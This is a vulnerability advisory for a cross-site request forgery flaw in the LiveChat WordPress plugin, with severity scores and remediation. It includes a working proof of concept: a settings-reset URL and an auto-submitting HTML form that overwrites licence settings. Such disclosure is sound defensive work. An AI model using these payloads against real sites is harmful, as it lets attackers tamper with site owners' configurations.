Main Vulnerability Database Vulnerabilities #VU19206

Cross-site request forgery in LiveChat - WP live chat plugin for WordPress - #VU19206

Published: July 17, 2019

Vulnerability identifier: #VU19206

CSH Severity: Low

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/U:Clear

CVE-ID: N/A

CWE-ID: CWE-352

Exploitation vector: Remote access

Exploit availability: No public exploit available

Vendor: WP-LiveChat

Affected software:
LiveChat - WP live chat plugin for WordPress

Detailed vulnerability description

The vulnerability allows a remote attacker to perform cross-site request forgery attacks.

The vulnerability exists due the lack of proper CSRF and Authorisation checks. A remote attacker can trick the victim to visit a specially crafted web page and update or reset the plugin's setting.

PoC:

Option Reset: 
https://[host]/wp-admin/admin-ajax.php?reset=1&page=livechat_settings

Option Update:
<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="licenseNumber" value="42"/>
      <input type="hidden" name="licenseEmail" value="whatever"/>
    </form>
  </body>
</html>

Remediation

Install updates from vendor's website.

Cross-site request forgery in LiveChat - WP live chat plugin for WordPress - #VU19206

Detailed vulnerability description

Remediation

Sources

Please verify you're human